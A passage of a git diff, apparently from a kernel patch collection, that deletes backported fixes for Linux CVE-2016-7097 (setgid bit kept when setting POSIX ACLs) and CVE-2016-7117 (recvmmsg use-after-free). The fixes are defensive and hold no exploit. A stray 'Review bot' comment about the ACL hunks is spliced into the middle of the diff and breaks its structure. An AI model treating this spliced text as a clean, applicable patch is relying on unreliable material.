ACL_TYPE_ACCESS: - name_index = F2FS_XATTR_INDEX_POSIX_ACL_ACCESS; - if (acl) { -- error = posix_acl_equiv_mode(acl, 
&inode->i_mode); -- if (error < 0) -+ error = posix_acl_update_mode(inode, &inode->i_mode, &acl); -+ if (error) - return error; - set_acl_inode(fi, inode->i_mode); -- if (error == 0) -- acl = NULL; - } - break; - -diff --git a/fs/generic_acl.c b/fs/generic_acl.c -index b3f3676796d31..21408084c3b34 100644 ---- a/fs/generic_acl.c -+++ b/fs/generic_acl.c -@@ -87,14 +87,10 @@ generic_acl_set(struct dentry *dentry, const char *name, const void *value, - goto failed; - switch (type) { - case ACL_TYPE_ACCESS: -- error = posix_acl_equiv_mode(acl, &inode->i_mode); -- if (error < 0) -+ error = posix_acl_update_mode(inode, &inode->i_mode, &acl); -+ if (error) - goto failed; - inode->i_ctime = CURRENT_TIME; -- if (error == 0) { -- posix_acl_release(acl); -- acl = NULL; -- } - break; - case ACL_TYPE_DEFAULT: - if (!S_ISDIR(inode->i_mode)) { -diff --git a/fs/gfs2/acl.c b/fs/gfs2/acl.c -index f69ac0af5496c..e7b330ef4dfda 100644 ---- a/fs/gfs2/acl.c -+++ b/fs/gfs2/acl.c -@@ -268,15 +268,10 @@ static int gfs2_xattr_system_set(struct dentry *dentry, const char *name, - - if (type == ACL_TYPE_ACCESS) { - umode_t mode = inode->i_mode; -- error = posix_acl_equiv_mode(acl, &mode); -+ error = posix_acl_update_mode(inode, &inode->i_mode, &acl); - -- if (error <= 0) { -- posix_acl_release(acl); -- acl = NULL; -- -- if (error < 0) -- return error; -- } -+ if (error) -+ goto out_release; - - error = gfs2_set_mode(inode, mode); - if (error) -diff --git a/fs/jffs2/acl.c b/fs/jffs2/acl.c -index 223283c301116..9335b8d3cf521 100644 ---- a/fs/jffs2/acl.c -+++ b/fs/jffs2/acl.c -@@ -243,9 +243,10 @@ static int jffs2_set_acl(struct inode *inode, int type, struct posix_acl *acl) - case ACL_TYPE_ACCESS: - xprefix = JFFS2_XPREFIX_ACL_ACCESS; - if (acl) { -- umode_t mode = inode->i_mode; -- rc = posix_acl_equiv_mode(acl, &mode); -- if (rc < 0) -+ umode_t mode; -+ -+ rc = posix_acl_update_mode(inode, &mode, &acl); -+ if (rc) - return rc; - if (inode->i_mode != mode) { - struct iattr attr; -@@ -257,8 
+258,6 @@ static int jffs2_set_acl(struct inode *inode, int type, struct posix_acl *acl) - if (rc < 0) - return rc; - } -- if (rc == 0) -- acl = NULL; - } - break; - case ACL_TYPE_DEFAULT: -diff --git a/fs/jfs/xattr.c b/fs/jfs/xattr.c -index 42d67f9757bf6..c79b1d7a53e24 100644 ---- a/fs/jfs/xattr.c -+++ b/fs/jfs/xattr.c -@@ -693,11 +693,11 @@ static int can_set_system_xattr(struct inode *inode, const char *name, - return rc; - } - if (acl) { -- rc = posix_acl_equiv_mode(acl, &inode->i_mode); -+ rc = posix_acl_update_mode(inode, &inode->i_mode, &acl); - posix_acl_release(acl); -- if (rc < 0) { -+ if (rc) { - printk(KERN_ERR -- "posix_acl_equiv_mode returned %d\n", -+ "posix_acl_update_mode returned %d\n", - rc); - return rc; - } -diff --git a/fs/ocfs2/acl.c b/fs/ocfs2/acl.c -index 8a404576fb265..2fe643160cf73 100644 ---- a/fs/ocfs2/acl.c -+++ b/fs/ocfs2/acl.c -@@ -275,19 +275,13 @@ static int ocfs2_set_acl(handle_t *handle, - name_index = OCFS2_XATTR_INDEX_POSIX_ACL_ACCESS; - if (acl) { - umode_t mode = inode->i_mode; -- ret = posix_acl_equiv_mode(acl, &mode); -- if (ret < 0) -+ ret = posix_acl_update_mode(inode, &mode, &acl); -+ if (ret) -+ return ret; -+ ret = ocfs2_acl_set_mode(inode, di_bh, -+ handle, mode); -+ if (ret) - return ret; -- else { -- if (ret == 0) -- acl = NULL; -- -- ret = ocfs2_acl_set_mode(inode, di_bh, -- handle, mode); -- if (ret) -- return ret; -- -- } - } - break; - case ACL_TYPE_DEFAULT: -diff --git a/fs/posix_acl.c b/fs/posix_acl.c -index 3542f1f814e2a..35cc1f40b82df 100644 ---- a/fs/posix_acl.c -+++ b/fs/posix_acl.c -@@ -341,6 +341,37 @@ static int posix_acl_create_masq(struct posix_acl *acl, umode_t *mode_p) - return not_equiv; - } - -+/** -+ * posix_acl_update_mode - update mode in set_acl -+ * -+ * Update the file mode when setting an ACL: compute the new file permission -+ * bits based on the ACL. In addition, if the ACL is equivalent to the new -+ * file mode, set *acl to NULL to indicate that no ACL should be set. 
-+ * -+ * As with chmod, clear the setgit bit if the caller is not in the owning group -+ * or capable of CAP_FSETID (see inode_change_ok). -+ * -+ * Called from set_acl inode operations. -+ */ -+int posix_acl_update_mode(struct inode *inode, umode_t *mode_p, -+ struct posix_acl **acl) -+{ -+ umode_t mode = inode->i_mode; -+ int error; -+ -+ error = posix_acl_equiv_mode(*acl, &mode); -+ if (error < 0) -+ return error; -+ if (error == 0) -+ *acl = NULL; -+ if (!in_group_p(inode->i_gid) && -+ !capable_wrt_inode_uidgid(inode, CAP_FSETID)) -+ mode &= ~S_ISGID; -+ *mode_p = mode; -+ return 0; -+} -+EXPORT_SYMBOL(posix_acl_update_mode); -+ - /* - * Modify the ACL for the chmod syscall. - */ -diff --git a/fs/reiserfs/xattr_acl.c b/fs/reiserfs/xattr_acl.c -index 6c8767fdfc6a2..2d73589f37d64 100644 ---- a/fs/reiserfs/xattr_acl.c -+++ b/fs/reiserfs/xattr_acl.c -@@ -286,13 +286,9 @@ reiserfs_set_acl(struct reiserfs_transaction_handle *th, struct inode *inode, - case ACL_TYPE_ACCESS: - name = POSIX_ACL_XATTR_ACCESS; - if (acl) { -- error = posix_acl_equiv_mode(acl, &inode->i_mode); -- if (error < 0) -+ error = posix_acl_update_mode(inode, &inode->i_mode, &acl); -+ if (error) - return error; -- else { -- if (error == 0) -- acl = NULL; -- } - } - break; - case ACL_TYPE_DEFAULT: -diff --git a/fs/xfs/xfs_acl.c b/fs/xfs/xfs_acl.c -index 306d883d89bc7..4f8e4770229cf 100644 ---- a/fs/xfs/xfs_acl.c -+++ b/fs/xfs/xfs_acl.c -@@ -389,16 +389,9 @@ xfs_xattr_acl_set(struct dentry *dentry, const char *name, - - if (type == ACL_TYPE_ACCESS) { - umode_t mode = inode->i_mode; -- error = posix_acl_equiv_mode(acl, &mode); -- -- if (error <= 0) { -- posix_acl_release(acl); -- acl = NULL; -- -- if (error < 0) -- return error; -- } -- -+ error = posix_acl_update_mode(inode, &mode, &acl); -+ if (error) -+ goto out_release; - error = xfs_set_mode(inode, mode); - if (error) - goto out_release; -diff --git a/include/linux/posix_acl.h b/include/linux/posix_acl.h -index 7931efe711755..2ae0bba45f124 
100644 ---- a/include/linux/posix_acl.h -+++ b/include/linux/posix_acl.h -@@ -90,6 +90,7 @@ extern struct posix_acl *posix_acl_from_mode(umode_t, gfp_t); - extern int posix_acl_equiv_mode(const struct posix_acl *, umode_t *); - extern int posix_acl_create(struct posix_acl **, gfp_t, umode_t *); - extern int posix_acl_chmod(struct posix_acl **, gfp_t, umode_t); -+extern int posix_acl_update_mode(struct inode *, umode_t *, struct posix_acl **); - - extern struct posix_acl *get_posix_acl(struct inode *, int); - extern int set_posix_acl(struct inode *, int, struct posix_acl *); diff --git a/Patches/Linux_CVEs/CVE-2016-7097/3.10/0003.patch b/Patches/Linux_CVEs/CVE-2016-7097/3.10/0003.patch deleted file mode 100644 index 3afc1919..00000000 --- a/Patches/Linux_CVEs/CVE-2016-7097/3.10/0003.patch +++ /dev/null 
@@ -1,45 +0,0 @@
-From aedf77d56472d1fddf050c61c1017d4f51149fb1 Mon Sep 17 00:00:00 2001
-From: Cong Wang
-Date: Tue, 13 Dec 2016 10:33:34 -0800
-Subject: [PATCH] FROMLIST: 9p: fix a potential acl leak
-
-(https://lkml.org/lkml/2016/12/13/579)
-
-posix_acl_update_mode() could possibly clear 'acl', if so
-we leak the memory pointed by 'acl'. Save this pointer
-before calling posix_acl_update_mode() and release the memory
-if 'acl' really gets cleared.
-
-Reported-by: Mark Salyzyn
-Reviewed-by: Jan Kara
-Reviewed-by: Greg Kurz
-Cc: Eric Van Hensbergen
-Cc: Ron Minnich
-Cc: Latchesar Ionkov
-Signed-off-by: Cong Wang
-Bug: 32458736
-Change-Id: Ia78da401e6fd1bfd569653bd2cd0ebd3f9c737a0
----
- fs/9p/acl.c | 2 ++
- 1 file changed, 2 insertions(+)
-
-diff --git a/fs/9p/acl.c b/fs/9p/acl.c
-index 9686c1f17653f..c19a66472d2eb 100644
---- a/fs/9p/acl.c
-+++ b/fs/9p/acl.c
-@@ -321,6 +321,7 @@ static int v9fs_xattr_set_acl(struct dentry *dentry, const char *name,
- name = POSIX_ACL_XATTR_ACCESS;
- if (acl) {
- struct iattr iattr;
-+ struct posix_acl *old_acl = acl;
-
- retval = posix_acl_update_mode(inode, &iattr.ia_mode, &acl);
- if (retval)
-@@ -331,6 +332,7 @@ static int v9fs_xattr_set_acl(struct dentry *dentry, const char *name,
- * by the mode bits. So don't
- * update ACL.
- */
-+ posix_acl_release(old_acl);
- value = NULL;
- size = 0;
- }
diff --git a/Patches/Linux_CVEs/CVE-2016-7097/^4.8/0001.patch b/Patches/Linux_CVEs/CVE-2016-7097/^4.8/0001.patch
deleted file mode 100644
index 94a7cfe6..00000000
--- a/Patches/Linux_CVEs/CVE-2016-7097/^4.8/0001.patch
+++ /dev/null
@@ -1,436 +0,0 @@ -From 073931017b49d9458aa351605b43a7e34598caef Mon Sep 17 00:00:00 2001 -From: Jan Kara -Date: Mon, 19 Sep 2016 17:39:09 +0200 -Subject: posix_acl: Clear SGID bit when setting file permissions - -When file permissions are modified via chmod(2) and the user is not in -the owning group or capable of CAP_FSETID, the setgid bit is cleared in -inode_change_ok(). Setting a POSIX ACL via setxattr(2) sets the file -permissions as well as the new ACL, but doesn't clear the setgid bit in -a similar way; this allows to bypass the check in chmod(2). Fix that. - -References: CVE-2016-7097 -Reviewed-by: Christoph Hellwig -Reviewed-by: Jeff Layton -Signed-off-by: Jan Kara -Signed-off-by: Andreas Gruenbacher ---- - fs/9p/acl.c | 40 +++++++++++++++++----------------------- - fs/btrfs/acl.c | 6 ++---- - fs/ceph/acl.c | 6 ++---- - fs/ext2/acl.c | 12 ++++-------- - fs/ext4/acl.c | 12 ++++-------- - fs/f2fs/acl.c | 6 ++---- - fs/gfs2/acl.c | 12 +++--------- - fs/hfsplus/posix_acl.c | 4 ++-- - fs/jffs2/acl.c | 9 ++++----- - fs/jfs/acl.c | 6 ++---- - fs/ocfs2/acl.c | 10 ++++------ - fs/orangefs/acl.c | 15 +++++---------- - fs/posix_acl.c | 31 +++++++++++++++++++++++++++++++ - fs/reiserfs/xattr_acl.c | 8 ++------ - fs/xfs/xfs_acl.c | 13 ++++--------- - include/linux/posix_acl.h | 1 + - 16 files changed, 89 insertions(+), 102 deletions(-) - -diff --git a/fs/9p/acl.c b/fs/9p/acl.c -index 5b6a174..b3c2cc7 100644 ---- a/fs/9p/acl.c -+++ b/fs/9p/acl.c -@@ -276,32 +276,26 @@ static int v9fs_xattr_set_acl(const struct xattr_handler *handler, - switch (handler->flags) { - case ACL_TYPE_ACCESS: - if (acl) { -- umode_t mode = inode->i_mode; -- retval = posix_acl_equiv_mode(acl, &mode); -- if (retval < 0) -+ struct iattr iattr; -+ -+ retval = posix_acl_update_mode(inode, &iattr.ia_mode, &acl); -+ if (retval) - goto err_out; -- else { -- struct iattr iattr; -- if (retval == 0) { -- /* -- * ACL can be represented -- * by the mode bits. So don't -- * update ACL. 
-- */ -- acl = NULL; -- value = NULL; -- size = 0; -- } -- /* Updte the mode bits */ -- iattr.ia_mode = ((mode & S_IALLUGO) | -- (inode->i_mode & ~S_IALLUGO)); -- iattr.ia_valid = ATTR_MODE; -- /* FIXME should we update ctime ? -- * What is the following setxattr update the -- * mode ? -+ if (!acl) { -+ /* -+ * ACL can be represented -+ * by the mode bits. So don't -+ * update ACL. - */ -- v9fs_vfs_setattr_dotl(dentry, &iattr); -+ value = NULL; -+ size = 0; - } -+ iattr.ia_valid = ATTR_MODE; -+ /* FIXME should we update ctime ? -+ * What is the following setxattr update the -+ * mode ? -+ */ -+ v9fs_vfs_setattr_dotl(dentry, &iattr); - } - break; - case ACL_TYPE_DEFAULT: -diff --git a/fs/btrfs/acl.c b/fs/btrfs/acl.c -index 53bb7af..247b8df 100644 ---- a/fs/btrfs/acl.c -+++ b/fs/btrfs/acl.c -@@ -79,11 +79,9 @@ static int __btrfs_set_acl(struct btrfs_trans_handle *trans, - case ACL_TYPE_ACCESS: - name = XATTR_NAME_POSIX_ACL_ACCESS; - if (acl) { -- ret = posix_acl_equiv_mode(acl, &inode->i_mode); -- if (ret < 0) -+ ret = posix_acl_update_mode(inode, &inode->i_mode, &acl); -+ if (ret) - return ret; -- if (ret == 0) -- acl = NULL; - } - ret = 0; - break; -diff --git a/fs/ceph/acl.c b/fs/ceph/acl.c -index 4f67227..d0b6b342 100644 ---- a/fs/ceph/acl.c -+++ b/fs/ceph/acl.c -@@ -95,11 +95,9 @@ int ceph_set_acl(struct inode *inode, struct posix_acl *acl, int type) - case ACL_TYPE_ACCESS: - name = XATTR_NAME_POSIX_ACL_ACCESS; - if (acl) { -- ret = posix_acl_equiv_mode(acl, &new_mode); -- if (ret < 0) -+ ret = posix_acl_update_mode(inode, &new_mode, &acl); -+ if (ret) - goto out; -- if (ret == 0) -- acl = NULL; - } - break; - case ACL_TYPE_DEFAULT: -diff --git a/fs/ext2/acl.c b/fs/ext2/acl.c -index 42f1d18..e725aa0 100644 ---- a/fs/ext2/acl.c -+++ b/fs/ext2/acl.c -@@ -190,15 +190,11 @@ ext2_set_acl(struct inode *inode, struct posix_acl *acl, int type) - case ACL_TYPE_ACCESS: - name_index = EXT2_XATTR_INDEX_POSIX_ACL_ACCESS; - if (acl) { -- error = posix_acl_equiv_mode(acl, 
&inode->i_mode); -- if (error < 0) -+ error = posix_acl_update_mode(inode, &inode->i_mode, &acl); -+ if (error) - return error; -- else { -- inode->i_ctime = CURRENT_TIME_SEC; -- mark_inode_dirty(inode); -- if (error == 0) -- acl = NULL; -- } -+ inode->i_ctime = CURRENT_TIME_SEC; -+ mark_inode_dirty(inode); - } - break; - -diff --git a/fs/ext4/acl.c b/fs/ext4/acl.c -index c6601a4..dfa5199 100644 ---- a/fs/ext4/acl.c -+++ b/fs/ext4/acl.c -@@ -193,15 +193,11 @@ __ext4_set_acl(handle_t *handle, struct inode *inode, int type, - case ACL_TYPE_ACCESS: - name_index = EXT4_XATTR_INDEX_POSIX_ACL_ACCESS; - if (acl) { -- error = posix_acl_equiv_mode(acl, &inode->i_mode); -- if (error < 0) -+ error = posix_acl_update_mode(inode, &inode->i_mode, &acl); -+ if (error) - return error; -- else { -- inode->i_ctime = ext4_current_time(inode); -- ext4_mark_inode_dirty(handle, inode); -- if (error == 0) -- acl = NULL; -- } -+ inode->i_ctime = ext4_current_time(inode); -+ ext4_mark_inode_dirty(handle, inode); - } - break; - -diff --git a/fs/f2fs/acl.c b/fs/f2fs/acl.c -index 4dcc9e2..3134424 100644 ---- a/fs/f2fs/acl.c -+++ b/fs/f2fs/acl.c -@@ -210,12 +210,10 @@ static int __f2fs_set_acl(struct inode *inode, int type, - case ACL_TYPE_ACCESS: - name_index = F2FS_XATTR_INDEX_POSIX_ACL_ACCESS; - if (acl) { -- error = posix_acl_equiv_mode(acl, &inode->i_mode); -- if (error < 0) -+ error = posix_acl_update_mode(inode, &inode->i_mode, &acl); -+ if (error) - return error; - set_acl_inode(inode, inode->i_mode); -- if (error == 0) -- acl = NULL; - } - break; - -diff --git a/fs/gfs2/acl.c b/fs/gfs2/acl.c -index 363ba9e..2524807 100644 ---- a/fs/gfs2/acl.c -+++ b/fs/gfs2/acl.c -@@ -92,17 +92,11 @@ int __gfs2_set_acl(struct inode *inode, struct posix_acl *acl, int type) - if (type == ACL_TYPE_ACCESS) { - umode_t mode = inode->i_mode; - -- error = posix_acl_equiv_mode(acl, &mode); -- if (error < 0) -+ error = posix_acl_update_mode(inode, &inode->i_mode, &acl); -+ if (error) - return error; -- -- if 
(error == 0) -- acl = NULL; -- -- if (mode != inode->i_mode) { -- inode->i_mode = mode; -+ if (mode != inode->i_mode) - mark_inode_dirty(inode); -- } - } - - if (acl) { -diff --git a/fs/hfsplus/posix_acl.c b/fs/hfsplus/posix_acl.c -index ab7ea25..9b92058 100644 ---- a/fs/hfsplus/posix_acl.c -+++ b/fs/hfsplus/posix_acl.c -@@ -65,8 +65,8 @@ int hfsplus_set_posix_acl(struct inode *inode, struct posix_acl *acl, - case ACL_TYPE_ACCESS: - xattr_name = XATTR_NAME_POSIX_ACL_ACCESS; - if (acl) { -- err = posix_acl_equiv_mode(acl, &inode->i_mode); -- if (err < 0) -+ err = posix_acl_update_mode(inode, &inode->i_mode, &acl); -+ if (err) - return err; - } - err = 0; -diff --git a/fs/jffs2/acl.c b/fs/jffs2/acl.c -index bc2693d..2a0f2a1 100644 ---- a/fs/jffs2/acl.c -+++ b/fs/jffs2/acl.c -@@ -233,9 +233,10 @@ int jffs2_set_acl(struct inode *inode, struct posix_acl *acl, int type) - case ACL_TYPE_ACCESS: - xprefix = JFFS2_XPREFIX_ACL_ACCESS; - if (acl) { -- umode_t mode = inode->i_mode; -- rc = posix_acl_equiv_mode(acl, &mode); -- if (rc < 0) -+ umode_t mode; -+ -+ rc = posix_acl_update_mode(inode, &mode, &acl); -+ if (rc) - return rc; - if (inode->i_mode != mode) { - struct iattr attr; -@@ -247,8 +248,6 @@ int jffs2_set_acl(struct inode *inode, struct posix_acl *acl, int type) - if (rc < 0) - return rc; - } -- if (rc == 0) -- acl = NULL; - } - break; - case ACL_TYPE_DEFAULT: -diff --git a/fs/jfs/acl.c b/fs/jfs/acl.c -index 21fa92b..3a1e155 100644 ---- a/fs/jfs/acl.c -+++ b/fs/jfs/acl.c -@@ -78,13 +78,11 @@ static int __jfs_set_acl(tid_t tid, struct inode *inode, int type, - case ACL_TYPE_ACCESS: - ea_name = XATTR_NAME_POSIX_ACL_ACCESS; - if (acl) { -- rc = posix_acl_equiv_mode(acl, &inode->i_mode); -- if (rc < 0) -+ rc = posix_acl_update_mode(inode, &inode->i_mode, &acl); -+ if (rc) - return rc; - inode->i_ctime = CURRENT_TIME; - mark_inode_dirty(inode); -- if (rc == 0) -- acl = NULL; - } - break; - case ACL_TYPE_DEFAULT: -diff --git a/fs/ocfs2/acl.c b/fs/ocfs2/acl.c -index 
2162434..164307b 100644 ---- a/fs/ocfs2/acl.c -+++ b/fs/ocfs2/acl.c -@@ -241,13 +241,11 @@ int ocfs2_set_acl(handle_t *handle, - case ACL_TYPE_ACCESS: - name_index = OCFS2_XATTR_INDEX_POSIX_ACL_ACCESS; - if (acl) { -- umode_t mode = inode->i_mode; -- ret = posix_acl_equiv_mode(acl, &mode); -- if (ret < 0) -- return ret; -+ umode_t mode; - -- if (ret == 0) -- acl = NULL; -+ ret = posix_acl_update_mode(inode, &mode, &acl); -+ if (ret) -+ return ret; - - ret = ocfs2_acl_set_mode(inode, di_bh, - handle, mode); -diff --git a/fs/orangefs/acl.c b/fs/orangefs/acl.c -index 28f2195..7a37544 100644 ---- a/fs/orangefs/acl.c -+++ b/fs/orangefs/acl.c -@@ -73,14 +73,11 @@ int orangefs_set_acl(struct inode *inode, struct posix_acl *acl, int type) - case ACL_TYPE_ACCESS: - name = XATTR_NAME_POSIX_ACL_ACCESS; - if (acl) { -- umode_t mode = inode->i_mode; -- /* -- * can we represent this with the traditional file -- * mode permission bits? -- */ -- error = posix_acl_equiv_mode(acl, &mode); -- if (error < 0) { -- gossip_err("%s: posix_acl_equiv_mode err: %d\n", -+ umode_t mode; -+ -+ error = posix_acl_update_mode(inode, &mode, &acl); -+ if (error) { -+ gossip_err("%s: posix_acl_update_mode err: %d\n", - __func__, - error); - return error; -@@ -90,8 +87,6 @@ int orangefs_set_acl(struct inode *inode, struct posix_acl *acl, int type) - SetModeFlag(orangefs_inode); - inode->i_mode = mode; - mark_inode_dirty_sync(inode); -- if (error == 0) -- acl = NULL; - } - break; - case ACL_TYPE_DEFAULT: -diff --git a/fs/posix_acl.c b/fs/posix_acl.c -index 59d47ab0..bfc3ec3 100644 ---- a/fs/posix_acl.c -+++ b/fs/posix_acl.c -@@ -626,6 +626,37 @@ no_mem: - } - EXPORT_SYMBOL_GPL(posix_acl_create); - -+/** -+ * posix_acl_update_mode - update mode in set_acl -+ * -+ * Update the file mode when setting an ACL: compute the new file permission -+ * bits based on the ACL. In addition, if the ACL is equivalent to the new -+ * file mode, set *acl to NULL to indicate that no ACL should be set. 
-+ * -+ * As with chmod, clear the setgit bit if the caller is not in the owning group -+ * or capable of CAP_FSETID (see inode_change_ok). -+ * -+ * Called from set_acl inode operations. -+ */ -+int posix_acl_update_mode(struct inode *inode, umode_t *mode_p, -+ struct posix_acl **acl) -+{ -+ umode_t mode = inode->i_mode; -+ int error; -+ -+ error = posix_acl_equiv_mode(*acl, &mode); -+ if (error < 0) -+ return error; -+ if (error == 0) -+ *acl = NULL; -+ if (!in_group_p(inode->i_gid) && -+ !capable_wrt_inode_uidgid(inode, CAP_FSETID)) -+ mode &= ~S_ISGID; -+ *mode_p = mode; -+ return 0; -+} -+EXPORT_SYMBOL(posix_acl_update_mode); -+ - /* - * Fix up the uids and gids in posix acl extended attributes in place. - */ -diff --git a/fs/reiserfs/xattr_acl.c b/fs/reiserfs/xattr_acl.c -index dbed42f..2737668 100644 ---- a/fs/reiserfs/xattr_acl.c -+++ b/fs/reiserfs/xattr_acl.c -@@ -242,13 +242,9 @@ __reiserfs_set_acl(struct reiserfs_transaction_handle *th, struct inode *inode, - case ACL_TYPE_ACCESS: - name = XATTR_NAME_POSIX_ACL_ACCESS; - if (acl) { -- error = posix_acl_equiv_mode(acl, &inode->i_mode); -- if (error < 0) -+ error = posix_acl_update_mode(inode, &inode->i_mode, &acl); -+ if (error) - return error; -- else { -- if (error == 0) -- acl = NULL; -- } - } - break; - case ACL_TYPE_DEFAULT: -diff --git a/fs/xfs/xfs_acl.c b/fs/xfs/xfs_acl.c -index b6e527b..8a0dec8 100644 ---- a/fs/xfs/xfs_acl.c -+++ b/fs/xfs/xfs_acl.c -@@ -257,16 +257,11 @@ xfs_set_acl(struct inode *inode, struct posix_acl *acl, int type) - return error; - - if (type == ACL_TYPE_ACCESS) { -- umode_t mode = inode->i_mode; -- error = posix_acl_equiv_mode(acl, &mode); -- -- if (error <= 0) { -- acl = NULL; -- -- if (error < 0) -- return error; -- } -+ umode_t mode; - -+ error = posix_acl_update_mode(inode, &mode, &acl); -+ if (error) -+ return error; - error = xfs_set_mode(inode, mode); - if (error) - return error; -diff --git a/include/linux/posix_acl.h b/include/linux/posix_acl.h -index 
d5d3d74..bf1046d 100644 ---- a/include/linux/posix_acl.h -+++ b/include/linux/posix_acl.h -@@ -93,6 +93,7 @@ extern int set_posix_acl(struct inode *, int, struct posix_acl *); - extern int posix_acl_chmod(struct inode *, umode_t); - extern int posix_acl_create(struct inode *, umode_t *, struct posix_acl **, - struct posix_acl **); -+extern int posix_acl_update_mode(struct inode *, umode_t *, struct posix_acl **); - - extern int simple_set_acl(struct inode *, struct posix_acl *, int); - extern int simple_acl_create(struct inode *, struct inode *); --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-7117/^4.5/0001.patch b/Patches/Linux_CVEs/CVE-2016-7117/^4.5/0001.patch deleted file mode 100644 index 0d30b687..00000000 --- a/Patches/Linux_CVEs/CVE-2016-7117/^4.5/0001.patch +++ /dev/null 
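Review bot: In the embedded fs/ext4/acl.c hunk (and likewise btrfs, ext2, f2fs, gfs2, hfsplus, jfs and reiserfs) `posix_acl_update_mode(inode, &inode->i_mode, &acl)` writes the new mode, including the cleared S_ISGID bit, straight into the in-core inode before the ACL itself is stored. The storing code lies outside these hunks, so this is inferred: if that later step fails, the inode would keep a mode that no longer matches its ACL. The jffs2, ocfs2, orangefs and xfs hunks already take the result in a local; the same shape would fit here, `umode_t mode;` with `error = posix_acl_update_mode(inode, &mode, &acl);`, assigning `inode->i_mode = mode;` only once the ACL has been written. The kernel-doc for the new helper also says "setgit" where "setgid" is meant.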
@@ -1,91 +0,0 @@
-From 34b88a68f26a75e4fded796f1a49c40f82234b7d Mon Sep 17 00:00:00 2001
-From: Arnaldo Carvalho de Melo
-Date: Mon, 14 Mar 2016 09:56:35 -0300
-Subject: net: Fix use after free in the recvmmsg exit path
-
-The syzkaller fuzzer hit the following use-after-free:
-
- Call Trace:
- [] __asan_report_load8_noabort+0x3e/0x40 mm/kasan/report.c:295
- [] __sys_recvmmsg+0x6fa/0x7f0 net/socket.c:2261
- [< inline >] SYSC_recvmmsg net/socket.c:2281
- [] SyS_recvmmsg+0x16f/0x180 net/socket.c:2270
- [] entry_SYSCALL_64_fastpath+0x16/0x7a
- arch/x86/entry/entry_64.S:185
-
-And, as Dmitry rightly assessed, that is because we can drop the
-reference and then touch it when the underlying recvmsg calls return
-some packets and then hit an error, which will make recvmmsg to set
-sock->sk->sk_err, oops, fix it.
-
-Reported-and-Tested-by: Dmitry Vyukov
-Cc: Alexander Potapenko
-Cc: Eric Dumazet
-Cc: Kostya Serebryany
-Cc: Sasha Levin
-Fixes: a2e2725541fa ("net: Introduce recvmmsg socket syscall")
-http://lkml.kernel.org/r/20160122211644.GC2470@redhat.com
-Signed-off-by: Arnaldo Carvalho de Melo
-Signed-off-by: David S. Miller
----
- net/socket.c | 38 +++++++++++++++++++-------------------
- 1 file changed, 19 insertions(+), 19 deletions(-)
-
-diff --git a/net/socket.c b/net/socket.c
-index c5ddc52..5f77a8e 100644
---- a/net/socket.c
-+++ b/net/socket.c
-@@ -2244,31 +2244,31 @@ int __sys_recvmmsg(int fd, struct mmsghdr __user *mmsg, unsigned int vlen,
- cond_resched();
- }
-
--out_put:
-- fput_light(sock->file, fput_needed);
--
- if (err == 0)
-- return datagrams;
-+ goto out_put;
-
-- if (datagrams != 0) {
-+ if (datagrams == 0) {
-+ datagrams = err;
-+ goto out_put;
-+ }
-+
-+ /*
-+ * We may return less entries than requested (vlen) if the
-+ * sock is non block and there aren't enough datagrams...
-+ */
-+ if (err != -EAGAIN) {
- /*
-- * We may return less entries than requested (vlen) if the
-- * sock is non block and there aren't enough datagrams...
-+ * ... or if recvmsg returns an error after we
-+ * received some datagrams, where we record the
-+ * error to return on the next call or if the
-+ * app asks about it using getsockopt(SO_ERROR).
- */
-- if (err != -EAGAIN) {
-- /*
-- * ... or if recvmsg returns an error after we
-- * received some datagrams, where we record the
-- * error to return on the next call or if the
-- * app asks about it using getsockopt(SO_ERROR).
-- */
-- sock->sk->sk_err = -err;
-- }
--
-- return datagrams;
-+ sock->sk->sk_err = -err;
- }
-+out_put:
-+ fput_light(sock->file, fput_needed);
-
-- return err;
-+ return datagrams;
- }
-
- SYSCALL_DEFINE5(recvmmsg, int, fd, struct mmsghdr __user *, mmsg,
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-7117/^4.5/0002.patch b/Patches/Linux_CVEs/CVE-2016-7117/^4.5/0002.patch
deleted file mode 100644
index d4abc30f..00000000
--- a/Patches/Linux_CVEs/CVE-2016-7117/^4.5/0002.patch
+++ /dev/null
@@ -1,49 +0,0 @@
-From 0b5240c45e2029986526b1405ab24906c708f770 Mon Sep 17 00:00:00 2001
-From: Maxime Jayat
-Date: Tue, 21 Feb 2017 18:35:51 +0100
-Subject: net: socket: fix recvmmsg not returning error from sock_error
-
-commit e623a9e9dec29ae811d11f83d0074ba254aba374 upstream.
-
-Commit 34b88a68f26a ("net: Fix use after free in the recvmmsg exit path"),
-changed the exit path of recvmmsg to always return the datagrams
-variable and modified the error paths to set the variable to the error
-code returned by recvmsg if necessary.
-
-However in the case sock_error returned an error, the error code was
-then ignored, and recvmmsg returned 0.
-
-Change the error path of recvmmsg to correctly return the error code
-of sock_error.
-
-The bug was triggered by using recvmmsg on a CAN interface which was
-not up. Linux 4.6 and later return 0 in this case while earlier
-releases returned -ENETDOWN.
-
-Fixes: 34b88a68f26a ("net: Fix use after free in the recvmmsg exit path")
-Signed-off-by: Maxime Jayat
-Signed-off-by: David S. Miller
-Signed-off-by: Willy Tarreau
----
- net/socket.c | 4 +++-
- 1 file changed, 3 insertions(+), 1 deletion(-)
-
-diff --git a/net/socket.c b/net/socket.c
-index e91e8ed..773ba3a 100644
---- a/net/socket.c
-+++ b/net/socket.c
-@@ -2326,8 +2326,10 @@ int __sys_recvmmsg(int fd, struct mmsghdr __user *mmsg, unsigned int vlen,
- return err;
-
- err = sock_error(sock->sk);
-- if (err)
-+ if (err) {
-+ datagrams = err;
- goto out_put;
-+ }
-
- entry = mmsg;
- compat_entry = (struct compat_mmsghdr __user *)mmsg;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-7910/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-7910/ANY/0001.patch
deleted file mode 100644
index 995fc458..00000000
--- a/Patches/Linux_CVEs/CVE-2016-7910/ANY/0001.patch
+++ /dev/null
